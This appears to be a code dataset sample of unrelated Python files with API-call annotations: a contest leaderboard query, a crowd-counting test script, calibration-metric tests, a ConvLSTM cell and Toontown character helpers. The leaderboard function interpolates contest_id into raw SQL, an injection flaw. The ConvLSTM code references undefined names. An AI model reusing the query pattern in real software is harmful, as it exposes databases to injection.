from ..models.ContestsChallengesModel import contests_challenges
from ..models.UsersModel import UserModel
from app.main import db
import uuid
import json
def get_raw_data(contest_id):
data_raw = db.engine.execute("select total.user_id, total.total, total.contest_id, u.name, u.email, c.contest_name from (select sum(max_score) as total, user_id, contest_id from attempts where contest_id = %s group by user_id) as total join users as u on u.id = total.user_id join contests as c on c.id = total.contest_id;"%(contest_id))
print(data_raw)
names = []
#names = [dict(row) for row in data_raw]
for row in data_raw:
temp_dict = {}
temp_dict['contest_id'] = row['contest_id']
temp_dict['user_id'] = row['user_id']
temp_dict['total'] = int(row['total'])
temp_dict['name'] = row['name']
temp_dict['email'] = row['email']
temp_dict['contest_name'] = row['contest_name']
names.append(temp_dict)
names = sorted(names, key = lambda i: i['total'])
names.reverse()
temp_score = names[0]['total']
rank = 1
count = 0
for i in names:
count = count + 1
if i['total'] == temp_score:
i['rank'] = rank
else:
temp_score = i['total']
i['rank'] = count
rank = count
resp = {"leaderboard": names,"comment":"success"}
return resp
|
[
"app.main.db.engine.execute"
] |
[((315, 651), 'app.main.db.engine.execute', 'db.engine.execute', (["('select total.user_id, total.total, total.contest_id, u.name, u.email, c.contest_name from (select sum(max_score) as total, user_id, contest_id from attempts where contest_id = %s group by user_id) as total join users as u on u.id = total.user_id join contests as c on c.id = total.contest_id;'\n % contest_id)"], {}), "(\n 'select total.user_id, total.total, total.contest_id, u.name, u.email, c.contest_name from (select sum(max_score) as total, user_id, contest_id from attempts where contest_id = %s group by user_id) as total join users as u on u.id = total.user_id join contests as c on c.id = total.contest_id;'\n % contest_id)\n", (332, 651), False, 'from app.main import db\n')]
|
import argparse
import torch
import os
import numpy as np
import datasets.crowd as crowd
from models import vgg19
def run():
torch.multiprocessing.freeze_support()
parser = argparse.ArgumentParser(description='Test ')
parser.add_argument('--device', default='0', help='assign device')
parser.add_argument('--crop-size', type=int, default=512,
help='the crop size of the train image')
parser.add_argument('--model-path', type=str, default='',
help='saved model path')
parser.add_argument('--data-path', type=str,
default='data/ShanghaiTech/part_A/',
help='saved model path')
parser.add_argument('--dataset', type=str, default='sha',
help='dataset name: sha, shb')
parser.add_argument('--pred-density-map-path', type=str, default='',
help='save predicted density maps when pred-density-map-path is not empty.')
args = parser.parse_args()
os.environ['CUDA_VISIBLE_DEVICES'] = args.device # set vis gpu
device = torch.device('cuda')
model_path = args.model_path
crop_size = args.crop_size
data_path = args.data_path
if args.dataset.lower() == 'sha' or args.dataset.lower() == 'shb':
dataset = crowd.Crowd_sh(os.path.join(data_path, 'test_data'), crop_size, 8, method='val')
else:
raise NotImplementedError
dataloader = torch.utils.data.DataLoader(dataset, 1, shuffle=False,
num_workers=1, pin_memory=True)
if args.pred_density_map_path:
import cv2
if not os.path.exists(args.pred_density_map_path):
os.makedirs(args.pred_density_map_path)
model = vgg19()
model.to(device)
model.load_state_dict(torch.load(model_path, device))
model.eval()
image_errs = []
print(dataloader)
for inputs, count, name in dataloader:
inputs = inputs.to(device)
assert inputs.size(0) == 1, 'the batch size should equal to 1'
with torch.set_grad_enabled(False):
outputs, _ = model(inputs)
img_err = count[0].item() - torch.sum(outputs).item()
image_errs.append(img_err)
if args.pred_density_map_path:
vis_img = outputs[0, 0].cpu().numpy()
# normalize density map values from 0 to 1, then map it to 0-255.
vis_img = (vis_img - vis_img.min()) / (vis_img.max() - vis_img.min() + 1e-5)
vis_img = (vis_img * 255).astype(np.uint8)
vis_img = cv2.applyColorMap(vis_img, cv2.COLORMAP_JET)
cv2.imwrite(os.path.join(args.pred_density_map_path, str(name[0]) + '.png'), vis_img)
image_errs = np.array(image_errs)
mse = np.sqrt(np.mean(np.square(image_errs)))
mae = np.mean(np.abs(image_errs))
print('{}: mae {}, mse {}\n'.format(model_path, mae, mse))
if __name__ == '__main__':
run()
|
[
"numpy.abs",
"argparse.ArgumentParser",
"torch.utils.data.DataLoader",
"os.makedirs",
"torch.sum",
"torch.load",
"torch.set_grad_enabled",
"os.path.exists",
"numpy.square",
"models.vgg19",
"torch.multiprocessing.freeze_support",
"numpy.array",
"cv2.applyColorMap",
"torch.device",
"os.path.join"
] |
[((130, 168), 'torch.multiprocessing.freeze_support', 'torch.multiprocessing.freeze_support', ([], {}), '()\n', (166, 168), False, 'import torch\n'), ((183, 227), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Test """'}), "(description='Test ')\n", (206, 227), False, 'import argparse\n'), ((1102, 1122), 'torch.device', 'torch.device', (['"""cuda"""'], {}), "('cuda')\n", (1114, 1122), False, 'import torch\n'), ((1451, 1541), 'torch.utils.data.DataLoader', 'torch.utils.data.DataLoader', (['dataset', '(1)'], {'shuffle': '(False)', 'num_workers': '(1)', 'pin_memory': '(True)'}), '(dataset, 1, shuffle=False, num_workers=1,\n pin_memory=True)\n', (1478, 1541), False, 'import torch\n'), ((1762, 1769), 'models.vgg19', 'vgg19', ([], {}), '()\n', (1767, 1769), False, 'from models import vgg19\n'), ((2733, 2753), 'numpy.array', 'np.array', (['image_errs'], {}), '(image_errs)\n', (2741, 2753), True, 'import numpy as np\n'), ((1817, 1847), 'torch.load', 'torch.load', (['model_path', 'device'], {}), '(model_path, device)\n', (1827, 1847), False, 'import torch\n'), ((2822, 2840), 'numpy.abs', 'np.abs', (['image_errs'], {}), '(image_errs)\n', (2828, 2840), True, 'import numpy as np\n'), ((1324, 1360), 'os.path.join', 'os.path.join', (['data_path', '"""test_data"""'], {}), "(data_path, 'test_data')\n", (1336, 1360), False, 'import os\n'), ((1653, 1695), 'os.path.exists', 'os.path.exists', (['args.pred_density_map_path'], {}), '(args.pred_density_map_path)\n', (1667, 1695), False, 'import os\n'), ((1709, 1748), 'os.makedirs', 'os.makedirs', (['args.pred_density_map_path'], {}), '(args.pred_density_map_path)\n', (1720, 1748), False, 'import os\n'), ((2070, 2099), 'torch.set_grad_enabled', 'torch.set_grad_enabled', (['(False)'], {}), '(False)\n', (2092, 2099), False, 'import torch\n'), ((2572, 2616), 'cv2.applyColorMap', 'cv2.applyColorMap', (['vis_img', 'cv2.COLORMAP_JET'], {}), '(vis_img, cv2.COLORMAP_JET)\n', (2589, 2616), False, 'import cv2\n'), ((2780, 2801), 'numpy.square', 'np.square', (['image_errs'], {}), '(image_errs)\n', (2789, 2801), True, 'import numpy as np\n'), ((2176, 2194), 'torch.sum', 'torch.sum', (['outputs'], {}), '(outputs)\n', (2185, 2194), False, 'import torch\n')]
|
# coding=utf-8
# Copyright 2020 The uncertainty_metrics Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Tests for calibration metrics."""
import numpy as np
import tensorflow.compat.v2 as tf
import uncertainty_metrics as um
class ExpectedCalibrationErrorTest(tf.test.TestCase):
def testBinaryClassification(self):
num_bins = 10
pred_probs = np.array([0.51, 0.45, 0.39, 0.66, 0.68, 0.29, 0.81, 0.85])
# max_pred_probs: [0.51, 0.55, 0.61, 0.66, 0.68, 0.71, 0.81, 0.85]
# pred_class: [1, 0, 0, 1, 1, 0, 1, 1]
labels = np.array([0., 0., 0., 1., 0., 1., 1., 1.])
n = len(pred_probs)
# Bins for the max predicted probabilities are (0, 0.1), [0.1, 0.2), ...,
# [0.9, 1) and are numbered starting at zero.
bin_counts = np.array([0, 0, 0, 0, 0, 2, 3, 1, 2, 0])
bin_correct_sums = np.array([0, 0, 0, 0, 0, 1, 2, 0, 2, 0])
bin_prob_sums = np.array([0, 0, 0, 0, 0, 0.51 + 0.55, 0.61 + 0.66 + 0.68,
0.71, 0.81 + 0.85, 0])
correct_ece = 0.
bin_accs = np.array([0.] * num_bins)
bin_confs = np.array([0.] * num_bins)
for i in range(num_bins):
if bin_counts[i] > 0:
bin_accs[i] = bin_correct_sums[i] / bin_counts[i]
bin_confs[i] = bin_prob_sums[i] / bin_counts[i]
correct_ece += bin_counts[i] / n * abs(bin_accs[i] - bin_confs[i])
metric = um.ExpectedCalibrationError(
num_bins, name='ECE', dtype=tf.float64)
self.assertEqual(len(metric.variables), 3)
ece1 = metric(labels, pred_probs)
self.assertAllClose(ece1, correct_ece)
actual_bin_counts = tf.convert_to_tensor(metric.counts)
actual_bin_correct_sums = tf.convert_to_tensor(metric.correct_sums)
actual_bin_prob_sums = tf.convert_to_tensor(metric.prob_sums)
self.assertAllEqual(bin_counts, actual_bin_counts)
self.assertAllEqual(bin_correct_sums, actual_bin_correct_sums)
self.assertAllClose(bin_prob_sums, actual_bin_prob_sums)
# Test various types of input shapes.
metric.reset_states()
metric.update_state(labels[:2], pred_probs[:2])
metric.update_state(labels[2:6].reshape(2, 2),
pred_probs[2:6].reshape(2, 2))
metric.update_state(labels[6:7], pred_probs[6:7])
ece2 = metric(labels[7:, np.newaxis], pred_probs[7:, np.newaxis])
ece3 = metric.result()
self.assertAllClose(ece2, ece3)
self.assertAllClose(ece3, correct_ece)
actual_bin_counts = tf.convert_to_tensor(metric.counts)
actual_bin_correct_sums = tf.convert_to_tensor(metric.correct_sums)
actual_bin_prob_sums = tf.convert_to_tensor(metric.prob_sums)
self.assertAllEqual(bin_counts, actual_bin_counts)
self.assertAllEqual(bin_correct_sums, actual_bin_correct_sums)
self.assertAllClose(bin_prob_sums, actual_bin_prob_sums)
def testBinaryClassificationKerasModel(self):
num_bins = 10
pred_probs = np.array([0.51, 0.45, 0.39, 0.66, 0.68, 0.29, 0.81, 0.85])
# max_pred_probs: [0.51, 0.55, 0.61, 0.66, 0.68, 0.71, 0.81, 0.85]
# pred_class: [1, 0, 0, 1, 1, 0, 1, 1]
labels = np.array([0., 0., 0., 1., 0., 1., 1., 1.])
n = len(pred_probs)
# Bins for the max predicted probabilities are (0, 0.1), [0.1, 0.2), ...,
# [0.9, 1) and are numbered starting at zero.
bin_counts = [0, 0, 0, 0, 0, 2, 3, 1, 2, 0]
bin_correct_sums = [0, 0, 0, 0, 0, 1, 2, 0, 2, 0]
bin_prob_sums = [0, 0, 0, 0, 0, 0.51 + 0.55, 0.61 + 0.66 + 0.68, 0.71,
0.81 + 0.85, 0]
correct_ece = 0.
bin_accs = [0.] * num_bins
bin_confs = [0.] * num_bins
for i in range(num_bins):
if bin_counts[i] > 0:
bin_accs[i] = bin_correct_sums[i] / bin_counts[i]
bin_confs[i] = bin_prob_sums[i] / bin_counts[i]
correct_ece += bin_counts[i] / n * abs(bin_accs[i] - bin_confs[i])
metric = um.ExpectedCalibrationError(num_bins, name='ECE')
self.assertEqual(len(metric.variables), 3)
model = tf.keras.models.Sequential([tf.keras.layers.Lambda(lambda x: 1*x)])
model.compile(loss='binary_crossentropy', optimizer='sgd', metrics=[metric])
outputs = model.predict(pred_probs)
self.assertAllClose(pred_probs.reshape([n, 1]), outputs)
_, ece = model.evaluate(pred_probs, labels)
self.assertAllClose(ece, correct_ece)
actual_bin_counts = tf.convert_to_tensor(metric.counts)
actual_bin_correct_sums = tf.convert_to_tensor(metric.correct_sums)
actual_bin_prob_sums = tf.convert_to_tensor(metric.prob_sums)
self.assertAllEqual(bin_counts, actual_bin_counts)
self.assertAllEqual(bin_correct_sums, actual_bin_correct_sums)
self.assertAllClose(bin_prob_sums, actual_bin_prob_sums)
def testMulticlassClassification(self):
num_bins = 10
pred_probs = [
[0.31, 0.32, 0.27],
[0.37, 0.33, 0.30],
[0.30, 0.31, 0.39],
[0.61, 0.38, 0.01],
[0.10, 0.65, 0.25],
[0.91, 0.05, 0.04],
]
# max_pred_probs: [0.32, 0.37, 0.39, 0.61, 0.65, 0.91]
# pred_class: [1, 0, 2, 0, 1, 0]
labels = [1., 0, 0., 1., 0., 0.]
n = len(pred_probs)
# Bins for the max predicted probabilities are (0, 0.1), [0.1, 0.2), ...,
# [0.9, 1) and are numbered starting at zero.
bin_counts = [0, 0, 0, 3, 0, 0, 2, 0, 0, 1]
bin_correct_sums = [0, 0, 0, 2, 0, 0, 0, 0, 0, 1]
bin_prob_sums = [0, 0, 0, 0.32 + 0.37 + 0.39, 0, 0, 0.61 + 0.65, 0, 0, 0.91]
correct_ece = 0.
bin_accs = [0.] * num_bins
bin_confs = [0.] * num_bins
for i in range(num_bins):
if bin_counts[i] > 0:
bin_accs[i] = bin_correct_sums[i] / bin_counts[i]
bin_confs[i] = bin_prob_sums[i] / bin_counts[i]
correct_ece += bin_counts[i] / n * abs(bin_accs[i] - bin_confs[i])
metric = um.ExpectedCalibrationError(
num_bins, name='ECE', dtype=tf.float64)
self.assertEqual(len(metric.variables), 3)
metric.update_state(labels[:4], pred_probs[:4])
ece1 = metric(labels[4:], pred_probs[4:])
ece2 = metric.result()
self.assertAllClose(ece1, ece2)
self.assertAllClose(ece2, correct_ece)
actual_bin_counts = tf.convert_to_tensor(metric.counts)
actual_bin_correct_sums = tf.convert_to_tensor(metric.correct_sums)
actual_bin_prob_sums = tf.convert_to_tensor(metric.prob_sums)
self.assertAllEqual(bin_counts, actual_bin_counts)
self.assertAllEqual(bin_correct_sums, actual_bin_correct_sums)
self.assertAllClose(bin_prob_sums, actual_bin_prob_sums)
if __name__ == '__main__':
tf.enable_v2_behavior()
tf.test.main()
|
[
"tensorflow.compat.v2.keras.layers.Lambda",
"tensorflow.compat.v2.test.main",
"tensorflow.compat.v2.enable_v2_behavior",
"tensorflow.compat.v2.convert_to_tensor",
"numpy.array",
"uncertainty_metrics.ExpectedCalibrationError"
] |
[((6981, 7004), 'tensorflow.compat.v2.enable_v2_behavior', 'tf.enable_v2_behavior', ([], {}), '()\n', (7002, 7004), True, 'import tensorflow.compat.v2 as tf\n'), ((7007, 7021), 'tensorflow.compat.v2.test.main', 'tf.test.main', ([], {}), '()\n', (7019, 7021), True, 'import tensorflow.compat.v2 as tf\n'), ((884, 942), 'numpy.array', 'np.array', (['[0.51, 0.45, 0.39, 0.66, 0.68, 0.29, 0.81, 0.85]'], {}), '([0.51, 0.45, 0.39, 0.66, 0.68, 0.29, 0.81, 0.85])\n', (892, 942), True, 'import numpy as np\n'), ((1070, 1120), 'numpy.array', 'np.array', (['[0.0, 0.0, 0.0, 1.0, 0.0, 1.0, 1.0, 1.0]'], {}), '([0.0, 0.0, 0.0, 1.0, 0.0, 1.0, 1.0, 1.0])\n', (1078, 1120), True, 'import numpy as np\n'), ((1283, 1323), 'numpy.array', 'np.array', (['[0, 0, 0, 0, 0, 2, 3, 1, 2, 0]'], {}), '([0, 0, 0, 0, 0, 2, 3, 1, 2, 0])\n', (1291, 1323), True, 'import numpy as np\n'), ((1347, 1387), 'numpy.array', 'np.array', (['[0, 0, 0, 0, 0, 1, 2, 0, 2, 0]'], {}), '([0, 0, 0, 0, 0, 1, 2, 0, 2, 0])\n', (1355, 1387), True, 'import numpy as np\n'), ((1408, 1493), 'numpy.array', 'np.array', (['[0, 0, 0, 0, 0, 0.51 + 0.55, 0.61 + 0.66 + 0.68, 0.71, 0.81 + 0.85, 0]'], {}), '([0, 0, 0, 0, 0, 0.51 + 0.55, 0.61 + 0.66 + 0.68, 0.71, 0.81 + 0.85, 0]\n )\n', (1416, 1493), True, 'import numpy as np\n'), ((1556, 1582), 'numpy.array', 'np.array', (['([0.0] * num_bins)'], {}), '([0.0] * num_bins)\n', (1564, 1582), True, 'import numpy as np\n'), ((1598, 1624), 'numpy.array', 'np.array', (['([0.0] * num_bins)'], {}), '([0.0] * num_bins)\n', (1606, 1624), True, 'import numpy as np\n'), ((1885, 1952), 'uncertainty_metrics.ExpectedCalibrationError', 'um.ExpectedCalibrationError', (['num_bins'], {'name': '"""ECE"""', 'dtype': 'tf.float64'}), "(num_bins, name='ECE', dtype=tf.float64)\n", (1912, 1952), True, 'import uncertainty_metrics as um\n'), ((2116, 2151), 'tensorflow.compat.v2.convert_to_tensor', 'tf.convert_to_tensor', (['metric.counts'], {}), '(metric.counts)\n', (2136, 2151), True, 'import tensorflow.compat.v2 as tf\n'), ((2182, 2223), 'tensorflow.compat.v2.convert_to_tensor', 'tf.convert_to_tensor', (['metric.correct_sums'], {}), '(metric.correct_sums)\n', (2202, 2223), True, 'import tensorflow.compat.v2 as tf\n'), ((2251, 2289), 'tensorflow.compat.v2.convert_to_tensor', 'tf.convert_to_tensor', (['metric.prob_sums'], {}), '(metric.prob_sums)\n', (2271, 2289), True, 'import tensorflow.compat.v2 as tf\n'), ((2955, 2990), 'tensorflow.compat.v2.convert_to_tensor', 'tf.convert_to_tensor', (['metric.counts'], {}), '(metric.counts)\n', (2975, 2990), True, 'import tensorflow.compat.v2 as tf\n'), ((3021, 3062), 'tensorflow.compat.v2.convert_to_tensor', 'tf.convert_to_tensor', (['metric.correct_sums'], {}), '(metric.correct_sums)\n', (3041, 3062), True, 'import tensorflow.compat.v2 as tf\n'), ((3090, 3128), 'tensorflow.compat.v2.convert_to_tensor', 'tf.convert_to_tensor', (['metric.prob_sums'], {}), '(metric.prob_sums)\n', (3110, 3128), True, 'import tensorflow.compat.v2 as tf\n'), ((3396, 3454), 'numpy.array', 'np.array', (['[0.51, 0.45, 0.39, 0.66, 0.68, 0.29, 0.81, 0.85]'], {}), '([0.51, 0.45, 0.39, 0.66, 0.68, 0.29, 0.81, 0.85])\n', (3404, 3454), True, 'import numpy as np\n'), ((3582, 3632), 'numpy.array', 'np.array', (['[0.0, 0.0, 0.0, 1.0, 0.0, 1.0, 1.0, 1.0]'], {}), '([0.0, 0.0, 0.0, 1.0, 0.0, 1.0, 1.0, 1.0])\n', (3590, 3632), True, 'import numpy as np\n'), ((4338, 4387), 'uncertainty_metrics.ExpectedCalibrationError', 'um.ExpectedCalibrationError', (['num_bins'], {'name': '"""ECE"""'}), "(num_bins, name='ECE')\n", (4365, 4387), True, 'import uncertainty_metrics as um\n'), ((4813, 4848), 'tensorflow.compat.v2.convert_to_tensor', 'tf.convert_to_tensor', (['metric.counts'], {}), '(metric.counts)\n', (4833, 4848), True, 'import tensorflow.compat.v2 as tf\n'), ((4879, 4920), 'tensorflow.compat.v2.convert_to_tensor', 'tf.convert_to_tensor', (['metric.correct_sums'], {}), '(metric.correct_sums)\n', (4899, 4920), True, 'import tensorflow.compat.v2 as tf\n'), ((4948, 4986), 'tensorflow.compat.v2.convert_to_tensor', 'tf.convert_to_tensor', (['metric.prob_sums'], {}), '(metric.prob_sums)\n', (4968, 4986), True, 'import tensorflow.compat.v2 as tf\n'), ((6239, 6306), 'uncertainty_metrics.ExpectedCalibrationError', 'um.ExpectedCalibrationError', (['num_bins'], {'name': '"""ECE"""', 'dtype': 'tf.float64'}), "(num_bins, name='ECE', dtype=tf.float64)\n", (6266, 6306), True, 'import uncertainty_metrics as um\n'), ((6593, 6628), 'tensorflow.compat.v2.convert_to_tensor', 'tf.convert_to_tensor', (['metric.counts'], {}), '(metric.counts)\n', (6613, 6628), True, 'import tensorflow.compat.v2 as tf\n'), ((6659, 6700), 'tensorflow.compat.v2.convert_to_tensor', 'tf.convert_to_tensor', (['metric.correct_sums'], {}), '(metric.correct_sums)\n', (6679, 6700), True, 'import tensorflow.compat.v2 as tf\n'), ((6728, 6766), 'tensorflow.compat.v2.convert_to_tensor', 'tf.convert_to_tensor', (['metric.prob_sums'], {}), '(metric.prob_sums)\n', (6748, 6766), True, 'import tensorflow.compat.v2 as tf\n'), ((4476, 4515), 'tensorflow.compat.v2.keras.layers.Lambda', 'tf.keras.layers.Lambda', (['(lambda x: 1 * x)'], {}), '(lambda x: 1 * x)\n', (4498, 4515), True, 'import tensorflow.compat.v2 as tf\n')]
|
"""
Convolutional LSTM cell implementation from https://github.com/loliverhennigh
"""
import tensorflow as tf
class BasicConvLSTMCell(object):
"""Basic Conv LSTM recurrent network cell.
"""
def __init__(self, shape, filter_size, num_features, forget_bias=1.0,
input_size=None, state_is_tuple=False, activation=tf.nn.tanh):
"""Initialize the basic Conv LSTM cell.
Args:
shape: int tuple thats the height and width of the cell
filter_size: int tuple thats the height and width of the filter
num_features: int thats the depth of the cell
forget_bias: float, The bias added to forget gates (see above).
input_size: Deprecated and unused.
state_is_tuple: If True, accepted and returned states are 2-tuples of
the `c_state` and `m_state`. If False, they are concatenated
along the column axis. The latter behavior will soon be deprecated.
activation: Activation function of the inner states.
"""
if input_size is not None:
logging.warn("%s: The input_size parameter is deprecated.", self)
self.shape = shape
self.filter_size = filter_size
self.num_features = num_features
self._forget_bias = forget_bias
self._state_is_tuple = state_is_tuple
self._activation = activation
@property
def state_size(self):
return (LSTMStateTuple(self._num_units, self._num_units)
if self._state_is_tuple else 2 * self._num_units)
@property
def output_size(self):
return self._num_units
def __call__(self, inputs, state, scope=None, reuse=False):
"""Long short-term memory cell (LSTM)."""
# "BasicLSTMCell"
with tf.variable_scope(scope or type(self).__name__, reuse=reuse):
# Parameters of gates are concatenated into one multiply for efficiency.
if self._state_is_tuple:
c, h = state
else:
c, h = tf.split(axis=3, num_or_size_splits=2, value=state)
concat = _conv_linear([inputs, h], self.filter_size,
self.num_features * 4, True)
# i = input_gate, j = new_input, f = forget_gate, o = output_gate
i, j, f, o = tf.split(axis=3, num_or_size_splits=4, value=concat)
new_c = (c * tf.nn.sigmoid(f + self._forget_bias) + tf.nn.sigmoid(i) *
self._activation(j))
new_h = self._activation(new_c) * tf.nn.sigmoid(o)
if self._state_is_tuple:
new_state = LSTMStateTuple(new_c, new_h)
else:
new_state = tf.concat(axis=3, values=[new_c, new_h])
return new_h, new_state
def _conv_linear(args, filter_size, num_features, bias,
bias_start=0.0, scope=None, reuse=False):
"""convolution:
Args:
args: a 4D Tensor or a list of 4D, batch x n, Tensors.
filter_size: int tuple of filter height and width.
num_features: int, number of features.
bias_start: starting value to initialize the bias; 0 by default.
scope: VariableScope for the created subgraph; defaults to "Linear".
reuse: For reusing already existing weights
Returns:
A 4D Tensor with shape [batch h w num_features]
Raises:
ValueError: if some of the arguments has unspecified or wrong shape.
"""
# Calculate the total size of arguments on dimension 1.
total_arg_size_depth = 0
shapes = [a.get_shape().as_list() for a in args]
for shape in shapes:
if len(shape) != 4:
raise ValueError("Linear is expecting 4D arguments: %s" % str(shapes))
if not shape[3]:
raise ValueError("Linear expects shape[4] of arguments: %s" % str(shapes))
else:
total_arg_size_depth += shape[3]
dtype = [a.dtype for a in args][0]
# Now the computation.
with tf.variable_scope(scope or "Conv", reuse=reuse):
matrix = tf.get_variable(
"Matrix", [filter_size[0], filter_size[1],
total_arg_size_depth, num_features], dtype=dtype)
if len(args) == 1:
res = tf.nn.conv2d(args[0], matrix, strides=[1, 1, 1, 1], padding='SAME')
else:
res = tf.nn.conv2d(tf.concat(axis=3, values=args), matrix,
strides=[1, 1, 1, 1], padding='SAME')
if not bias:
return res
bias_term = tf.get_variable(
"Bias", [num_features],
dtype=dtype, initializer=tf.constant_initializer(bias_start,
dtype=dtype)
)
return res + bias_term
|
[
"tensorflow.constant_initializer",
"tensorflow.variable_scope",
"tensorflow.concat",
"tensorflow.nn.sigmoid",
"tensorflow.nn.conv2d",
"tensorflow.split",
"tensorflow.get_variable"
] |
[((3677, 3724), 'tensorflow.variable_scope', 'tf.variable_scope', (["(scope or 'Conv')"], {'reuse': 'reuse'}), "(scope or 'Conv', reuse=reuse)\n", (3694, 3724), True, 'import tensorflow as tf\n'), ((3739, 3851), 'tensorflow.get_variable', 'tf.get_variable', (['"""Matrix"""', '[filter_size[0], filter_size[1], total_arg_size_depth, num_features]'], {'dtype': 'dtype'}), "('Matrix', [filter_size[0], filter_size[1],\n total_arg_size_depth, num_features], dtype=dtype)\n", (3754, 3851), True, 'import tensorflow as tf\n'), ((2145, 2197), 'tensorflow.split', 'tf.split', ([], {'axis': '(3)', 'num_or_size_splits': '(4)', 'value': 'concat'}), '(axis=3, num_or_size_splits=4, value=concat)\n', (2153, 2197), True, 'import tensorflow as tf\n'), ((3911, 3978), 'tensorflow.nn.conv2d', 'tf.nn.conv2d', (['args[0]', 'matrix'], {'strides': '[1, 1, 1, 1]', 'padding': '"""SAME"""'}), "(args[0], matrix, strides=[1, 1, 1, 1], padding='SAME')\n", (3923, 3978), True, 'import tensorflow as tf\n'), ((1886, 1937), 'tensorflow.split', 'tf.split', ([], {'axis': '(3)', 'num_or_size_splits': '(2)', 'value': 'state'}), '(axis=3, num_or_size_splits=2, value=state)\n', (1894, 1937), True, 'import tensorflow as tf\n'), ((2352, 2368), 'tensorflow.nn.sigmoid', 'tf.nn.sigmoid', (['o'], {}), '(o)\n', (2365, 2368), True, 'import tensorflow as tf\n'), ((2482, 2522), 'tensorflow.concat', 'tf.concat', ([], {'axis': '(3)', 'values': '[new_c, new_h]'}), '(axis=3, values=[new_c, new_h])\n', (2491, 2522), True, 'import tensorflow as tf\n'), ((4014, 4044), 'tensorflow.concat', 'tf.concat', ([], {'axis': '(3)', 'values': 'args'}), '(axis=3, values=args)\n', (4023, 4044), True, 'import tensorflow as tf\n'), ((4249, 4297), 'tensorflow.constant_initializer', 'tf.constant_initializer', (['bias_start'], {'dtype': 'dtype'}), '(bias_start, dtype=dtype)\n', (4272, 4297), True, 'import tensorflow as tf\n'), ((2218, 2254), 'tensorflow.nn.sigmoid', 'tf.nn.sigmoid', (['(f + self._forget_bias)'], {}), '(f + self._forget_bias)\n', (2231, 2254), True, 'import tensorflow as tf\n'), ((2257, 2273), 'tensorflow.nn.sigmoid', 'tf.nn.sigmoid', (['i'], {}), '(i)\n', (2270, 2273), True, 'import tensorflow as tf\n')]
|
from panda3d.core import CollisionTube, CollisionNode
from libotp.nametag.NametagGroup import *
from toontown.pets import Pet
from toontown.suit import SuitDNA, Suit
from toontown.toon import NPCToons, Toon, ToonDNA
from toontown.toonbase import TTLocalizer
from toontown.toonbase import ToontownGlobals
def createToon(toonId, x=0, y=0, z=0, h=0, p=0, r=0, parent=render, anim='neutral', LOD=1000, isDisguised=False, suitType='f', coll=True):
newToon = NPCToons.createLocalNPC(toonId)
if not newToon:
newToon = NPCToons.createLocalNPC(1)
newToon.head = newToon.find('**/__Actor_head')
if isDisguised:
newToon.putOnSuit(suitType, False, False)
if coll:
collTube = CollisionTube(0, 0, 0.5, 0, 0, 4, 2)
collNode = CollisionNode('suit')
collNode.addSolid(collTube)
newToon.attachNewNode(collNode)
else:
newToon.useLOD(LOD)
if coll:
newToon.initializeBodyCollisions('toon')
newToon.setPosHpr(x, y, z, h, p, r)
newToon.reparentTo(parent)
newToon.loop(anim)
return newToon
def createUniqueToon(name, dna, hat, glasses, backpack, shoes, x=0, y=0, z=0, h=0, p=0, r=0, parent=render, anim='neutral', LOD=1000, isDisguised=False, suitType='f', suitDept='c', isWaiter=False, isRental=False, coll=True, colorType=NametagGroup.CCNonPlayer, cogLevels=(0, 0, 0, 0, 0), cheesyEffect=ToontownGlobals.CENormal, nametagStyle=100):
newToon = Toon.Toon()
newToon.setName(name)
newToon.setPickable(0)
newToon.setPlayerType(colorType)
if nametagStyle == 100:
font = loader.loadFont(TTLocalizer.InterfaceFont)
else:
font = loader.loadFont(TTLocalizer.NametagFonts[nametagStyle])
newToon.nametag.setFont(font)
newDNA = ToonDNA.ToonDNA()
newDNA.newToonFromProperties(*dna)
newToon.setDNAString(newDNA.makeNetString())
newToon.applyCheesyEffect(cheesyEffect, 0)
newToon.head = newToon.find('**/__Actor_head')
newToon.setHat(*hat)
newToon.setBackpack(*backpack)
newToon.setGlasses(*glasses)
newToon.setShoes(*shoes)
if isDisguised:
if isWaiter:
cogType = 4
else:
cogType = 0
newToon.cogLevels = []
for l in cogLevels:
newToon.cogLevels.append(l)
if cogType in ToontownGlobals.PutOnSuitRental or isRental:
index = ToontownGlobals.CogDepts.index(suitDept)
newToon.putOnSuit(index, cogType=cogType, rental=True)
else:
newToon.putOnSuit(suitType, cogType=cogType, rental=isRental)
if coll:
collTube = CollisionTube(0, 0, 0.5, 0, 0, 4, 2)
collNode = CollisionNode('suit')
collNode.addSolid(collTube)
newToon.attachNewNode(collNode)
else:
newToon.useLOD(LOD)
if coll:
newToon.initializeBodyCollisions('toon')
newToon.setPosHpr(x, y, z, h, p, r)
newToon.reparentTo(parent)
newToon.loop(anim)
return newToon
def createCog(cogType, x=0, y=0, z=0, h=0, p=0, r=0, isSkelecog=False, isWaiter=False, isVirtual=False, isSkeleRevive=False, colorType=NametagGroup.CCSuit, anim='neutral', parent=render, name=None, dept=None, level=None, coll=True):
newCog = Suit.Suit()
newCog.dna = SuitDNA.SuitDNA()
newCog.dna.newSuit(cogType)
newCog.setDNA(newCog.dna)
newCog.setPlayerType(colorType)
newCog.setPickable(0)
level = level if level != None else newCog.getActualLevel()
if isWaiter:
newCog.makeWaiter()
if isSkelecog:
newCog.makeSkeleton()
newCog.setName(TTLocalizer.Skeleton)
if isVirtual:
newCog.makeVirtual()
if isSkeleRevive:
level = '%s%s' % (level, TTLocalizer.SkeleRevivePostFix)
if name != None:
newCog.setName(name)
if dept is False:
nameInfo = TTLocalizer.SuitBaseNameWithoutDept % {'name': newCog._name, 'level': level}
else:
nameInfo = TTLocalizer.SuitBaseNameWithLevel % {'name': newCog._name, 'dept': dept if dept != None else newCog.getStyleDept(),
'level': level}
newCog.setPosHpr(x, y, z, h, p, r)
newCog.reparentTo(parent)
newCog.loop(anim)
newCog.setDisplayName(nameInfo)
if coll:
collTube = CollisionTube(0, 0, 0.5, 0, 0, 4, 2)
collNode = CollisionNode('suit')
collNode.addSolid(collTube)
newCog.attachNewNode(collNode)
return newCog
def createDoodle(name, head, ears, nose, tail, body, color, colorScale, eyes, gender, x=0, y=0, z=0, h=0, p=0, r=0, parent=render, coll=True):
doodle = Pet.Pet()
